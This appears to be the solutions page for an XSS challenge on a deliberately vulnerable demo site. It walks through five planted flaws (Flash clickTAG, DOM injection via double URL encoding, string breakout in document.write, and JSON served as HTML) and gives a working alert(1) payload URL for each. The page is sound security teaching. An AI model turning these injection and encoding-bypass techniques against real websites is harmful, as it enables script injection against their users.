Solutions

These are the intended XSS-vulnerabilities. Some of the solutions will be blocked by your browsers XSS protection.

There might be one more :-)

Visitor fun facts:

Number of countries:	44
Top 3 visiting countries:	India (18.50%), USA(14.99%), Norway(10.53%)
Average time on page:	00:04:45
Top 3 browsers:	Chrome (52.3%), Firefox (31.9%), Safari (4.94%)
Top 3 OS:	Windows(61.56%), OS X (13.72%), Linux (12.76%)
Java enabled	72,57%
Vulnerable flash version:	At least 10%

1. Flash based XSS

This is a classic XSS error found in loads of flash ads. They have a parameter called clickTAG allowing the embdding party to at a later time specify the link to which the ad should forward to upon click.

<object width="500" height="100">
<param name="movie" value="xssmas.swf?clickTAG=gifts.html">
<embed src="xssmas.swf?clickTAG=gifts.html" 
width="500" height="100">
</embed>
</object>

However because a flash can be referenced directly, we can do something like this:

http://research.insecurelabs.org/xssmas/xssmas.swf?clickTAG=javascript:alert(1)

2. DOM-based XSS

This combined reflected and DOM-based XSS relies upon the javascript receiving a variable n with a value from a URL-parameter. The value is partially escaped, and then copied url decoded and written using jQuery's html().

<script>
var n = '';
if (n != '') {
	$(function() {
		$("h1").html("Merry XSSmas, " + unescape(n) + "!");
	});
}
</script>

By double URL encoding the data, it's easy to bypass the partial escaping.

http://research.insecurelabs.org/xssmas/?n=%253Cscript%253Ealert%25281%2529%253C/script%253E

There might be another vulernability here as well, as the partial escaping is escaping these characters: ' <> / As we see it's not escaping the backslash, so a value of \' will render as \\', and thus breaks out of the string. Has anybody found a solution for this one?

3. and 4. Reflected XSS and DOM-based XSS

In the fake script below it's pretending to do analytics, but there are two big mistakes here. The escaping in use is for HTML only, when this is clearly a javascript + HTML context.

<script>
<!-- Analytics: no change below this line -->
document.write('<img src="analytics?url=query string">');
</script>

So the the first vulnerability is lack of javascript escaping. By entering a single quote we break out of the string. We can then run arbitrary javascript

http://research.insecurelabs.org/xssmas/?n'%2Balert(1)%2B'

The second problem here is that the escaping is by mistake using a replace instead of replaceAll. So even though <, > and " is escaped, we can easily bypass it to make the javascript write malicious javascript code

http://research.insecurelabs.org/xssmas/?%22%3C%3E%22%3E%3Cscript%3Ealert(1)/*

5. Wrong Content-Type

The search field loads a JSON feed of search results, which also includes the query as a part of the response. By opening the search result JSON directly in the browser, the browser will interpret the content as HTML instead of JSON. We can thus simply put in a single script tag and have it execute

http://research.insecurelabs.org/xssmas/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E

Other

Some people sent me solutions using the URL http://research.insecurelabs.org/xssmas/index/analytics. This is simply a different way to reference the same index.php as the one at http://research.insecurelabs.org/xssmas/. The reason why the page looks different is, the references to the JS and stylesheet does not work when referenced this way.